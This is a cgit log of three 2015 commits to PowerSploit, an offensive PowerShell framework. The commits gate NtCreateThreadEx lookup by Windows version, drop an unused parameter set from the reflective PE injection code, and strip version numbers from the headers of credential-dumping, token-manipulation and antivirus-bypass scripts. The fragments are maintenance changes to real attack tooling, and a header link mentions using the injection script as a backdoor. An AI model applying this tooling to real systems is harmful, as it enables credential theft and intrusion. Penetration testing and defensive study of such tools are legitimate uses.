b/Exfiltration/Invoke-Mimikatz.ps1 @@ -609,10 +609,13 @@ $RemoteScriptBlock = { $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf - $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx - $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) - $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx + # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP + if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) { + $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx + $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) + $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx + } $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) -- cgit v1.2.3 From 00af1656b2832807eadbc062eee80e21918c0276 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Mon, 14 Dec 2015 17:26:33 -0800 Subject: Bugfix #93 Removed the "EndAddress" parameter set since it was never used. This should resolve any parameter set confusion. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 14 +------------- Exfiltration/Invoke-Mimikatz.ps1 | 14 +------------- Exfiltration/Invoke-NinjaCopy.ps1 | 14 +------------- 3 files changed, 3 insertions(+), 39 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index d164493..4a1d0e8 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -912,24 +912,12 @@ $RemoteScriptBlock = { [IntPtr] $StartAddress, - [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] - [IntPtr] - $EndAddress, - [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] [IntPtr] $Size ) - [IntPtr]$FinalEndAddress = [IntPtr]::Zero - if ($PsCmdlet.ParameterSetName -eq "Size") - { - [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) - } - else - { - $FinalEndAddress = $EndAddress - } + [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) $PEEndAddress = $PEInfo.EndAddress diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1 index 835d7a7..85cef30 100644 --- a/Exfiltration/Invoke-Mimikatz.ps1 +++ b/Exfiltration/Invoke-Mimikatz.ps1 @@ -802,24 +802,12 @@ $RemoteScriptBlock = { [IntPtr] $StartAddress, - [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] - [IntPtr] - $EndAddress, - [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] [IntPtr] $Size ) - [IntPtr]$FinalEndAddress = [IntPtr]::Zero - if ($PsCmdlet.ParameterSetName -eq "Size") - { - [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) - } - else - { - $FinalEndAddress = $EndAddress - } + [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) $PEEndAddress = $PEInfo.EndAddress diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1 index 7ff5bfa..36cef8d 100644 --- a/Exfiltration/Invoke-NinjaCopy.ps1 +++ b/Exfiltration/Invoke-NinjaCopy.ps1 @@ -818,24 +818,12 @@ $RemoteScriptBlock = { [IntPtr] $StartAddress, - [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)] - [IntPtr] - $EndAddress, - [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] [IntPtr] $Size ) - [IntPtr]$FinalEndAddress = [IntPtr]::Zero - if ($PsCmdlet.ParameterSetName -eq "Size") - { - [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) - } - else - { - $FinalEndAddress = $EndAddress - } + [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) $PEEndAddress = $PEInfo.EndAddress -- cgit v1.2.3 From c2a70924e16cd80a1c07d9de82db893b32a4aba9 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Wed, 16 Dec 2015 17:07:39 -0800 Subject: Removed all version numbers from scripts Scripts in a module should not be individually versioned. Only the module should be versioned. --- AntivirusBypass/AntivirusBypass.psd1 | 44 -------------------------- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 5 +-- CodeExecution/Invoke-WmiCommand.ps1 | 2 -- Exfiltration/Get-GPPPassword.ps1 | 1 - Exfiltration/Invoke-CredentialInjection.ps1 | 1 - Exfiltration/Invoke-Mimikatz.ps1 | 14 ++------ Exfiltration/Invoke-NinjaCopy.ps1 | 2 -- Exfiltration/Invoke-TokenManipulation.ps1 | 2 -- Exfiltration/VolumeShadowCopyTools.ps1 | 4 --- PowerSploit.psd1 | 3 +- Recon/Invoke-Portscan.ps1 | 4 --- 11 files changed, 5 insertions(+), 77 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/AntivirusBypass/AntivirusBypass.psd1 b/AntivirusBypass/AntivirusBypass.psd1 index 29949c1..507cfdb 100644 --- a/AntivirusBypass/AntivirusBypass.psd1 +++ b/AntivirusBypass/AntivirusBypass.psd1 @@ -1,5 +1,4 @@ @{ - # Script module or binary module file associated with this manifest. ModuleToProcess = 'AntivirusBypass.psm1' @@ -24,39 +23,6 @@ Description = 'PowerSploit Antivirus Avoidance/Bypass Module' # Minimum version of the Windows PowerShell engine required by this module PowerShellVersion = '2.0' -# Name of the Windows PowerShell host required by this module -# PowerShellHostName = '' - -# Minimum version of the Windows PowerShell host required by this module -# PowerShellHostVersion = '' - -# Minimum version of the .NET Framework required by this module -# DotNetFrameworkVersion = '' - -# Minimum version of the common language runtime (CLR) required by this module -# CLRVersion = '' - -# Processor architecture (None, X86, Amd64) required by this module -# ProcessorArchitecture = '' - -# Modules that must be imported into the global environment prior to importing this module -# RequiredModules = @() - -# Assemblies that must be loaded prior to importing this module -# RequiredAssemblies = @() - -# Script files (.ps1) that are run in the caller's environment prior to importing this module. -# ScriptsToProcess = '' - -# Type files (.ps1xml) to be loaded when importing this module -# TypesToProcess = @() - -# Format files (.ps1xml) to be loaded when importing this module -# FormatsToProcess = @() - -# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess -# NestedModules = @() - # Functions to export from this module FunctionsToExport = '*' @@ -74,14 +40,4 @@ ModuleList = @(@{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID # List of all files packaged with this module FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' - -# Private data to pass to the module specified in RootModule/ModuleToProcess -# PrivateData = '' - -# HelpInfo URI of this module -# HelpInfoURI = '' - -# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. -# DefaultCommandPrefix = '' - } diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 4a1d0e8..990c4b1 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -153,13 +153,10 @@ Find a DemoDLL at: https://github.com/clymb3r/PowerShell/tree/master/Invoke-Refl .LINK -Blog: http://clymb3r.wordpress.com/ -Github repo: https://github.com/clymb3r/PowerShell/tree/master/Invoke-ReflectivePEInjection +http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ -Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/blog/ - #> [CmdletBinding()] diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1 index c15d478..0c06424 100644 --- a/CodeExecution/Invoke-WmiCommand.ps1 +++ b/CodeExecution/Invoke-WmiCommand.ps1 @@ -1,5 +1,3 @@ -#Requires -Version 2 - function Invoke-WmiCommand { <# .SYNOPSIS diff --git a/Exfiltration/Get-GPPPassword.ps1 b/Exfiltration/Get-GPPPassword.ps1 index ea87de4..768a0d2 100644 --- a/Exfiltration/Get-GPPPassword.ps1 +++ b/Exfiltration/Get-GPPPassword.ps1 @@ -9,7 +9,6 @@ function Get-GPPPassword { License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.4.2 .DESCRIPTION diff --git a/Exfiltration/Invoke-CredentialInjection.ps1 b/Exfiltration/Invoke-CredentialInjection.ps1 index f4357bd..a7b312d 100644 --- a/Exfiltration/Invoke-CredentialInjection.ps1 +++ b/Exfiltration/Invoke-CredentialInjection.ps1 @@ -13,7 +13,6 @@ function Invoke-CredentialInjection License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 1.1 .DESCRIPTION diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1 index 6934584..c701f63 100644 --- a/Exfiltration/Invoke-Mimikatz.ps1 +++ b/Exfiltration/Invoke-Mimikatz.ps1 @@ -15,9 +15,7 @@ Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: http://blog.gentilkiwi.com. License: http://creativecommons.org/licenses/by/3.0/fr/ Required Dependencies: Mimikatz (included) Optional Dependencies: None -Version: 1.5 -ReflectivePEInjection version: 1.1 -Mimikatz version: 2.0 alpha (2/16/2015) +Mimikatz version: 2.0 alpha (12/14/2015) .DESCRIPTION @@ -62,15 +60,7 @@ Find mimikatz at: http://blog.gentilkiwi.com .LINK -Blog: http://clymb3r.wordpress.com/ -Benjamin DELPY blog: http://blog.gentilkiwi.com - -Github repo: https://github.com/clymb3r/PowerShell -mimikatz Github repo: https://github.com/gentilkiwi/mimikatz - -Blog on reflective loading: http://clymb3r.wordpress.com/2013/04/06/reflective-dll-injection-with-powershell/ -Blog on modifying mimikatz for reflective loading: http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ - +http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ #> [CmdletBinding(DefaultParameterSetName="DumpCreds")] diff --git a/Exfiltration/Invoke-NinjaCopy.ps1 b/Exfiltration/Invoke-NinjaCopy.ps1 index 36cef8d..15bee1b 100644 --- a/Exfiltration/Invoke-NinjaCopy.ps1 +++ b/Exfiltration/Invoke-NinjaCopy.ps1 @@ -25,8 +25,6 @@ Contributors: This script has a byte array hardcoded, which contains a DLL wich License: GPLv3 or later Required Dependencies: None Optional Dependencies: None -Version: 1.1 -ReflectivePEInjection version: 1.1 .DESCRIPTION diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index 90f9d47..3a61da8 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -49,8 +49,6 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.12 -(1.11 -> 1.12: Simple logic added by Josh M. Bryant to find an unprotected process to grab a SYSTEM token from, rather than hardcoding to wininit, https://www.fixtheexchange.com/) .DESCRIPTION diff --git a/Exfiltration/VolumeShadowCopyTools.ps1 b/Exfiltration/VolumeShadowCopyTools.ps1 index 9d6952e..579dd0e 100644 --- a/Exfiltration/VolumeShadowCopyTools.ps1 +++ b/Exfiltration/VolumeShadowCopyTools.ps1 @@ -10,7 +10,6 @@ function Get-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 #> $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()) @@ -35,7 +34,6 @@ function New-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 .DESCRIPTION @@ -121,7 +119,6 @@ function Remove-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 .DESCRIPTION @@ -180,7 +177,6 @@ function Mount-VolumeShadowCopy License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None - Version: 2.0.0 .DESCRIPTION diff --git a/PowerSploit.psd1 b/PowerSploit.psd1 index 678294b..0137fd7 100644 --- a/PowerSploit.psd1 +++ b/PowerSploit.psd1 @@ -41,5 +41,6 @@ ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUI @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'}, @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'}, @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'}, - @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'} ) + @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'}, + @{ModuleName = 'PrivEsc'; ModuleVersion = '1.0.0.0'; GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'} ) } diff --git a/Recon/Invoke-Portscan.ps1 b/Recon/Invoke-Portscan.ps1 index 99bbb89..6f059e2 100644 --- a/Recon/Invoke-Portscan.ps1 +++ b/Recon/Invoke-Portscan.ps1 @@ -15,10 +15,6 @@ Optional Dependencies: None Does a simple port scan using regular sockets, based (pretty) loosely on nmap -.NOTES - -version .13 - .PARAMETER Hosts Include these comma seperated hosts (supports IPv4 CIDR notation) or pipe them in -- cgit v1.2.3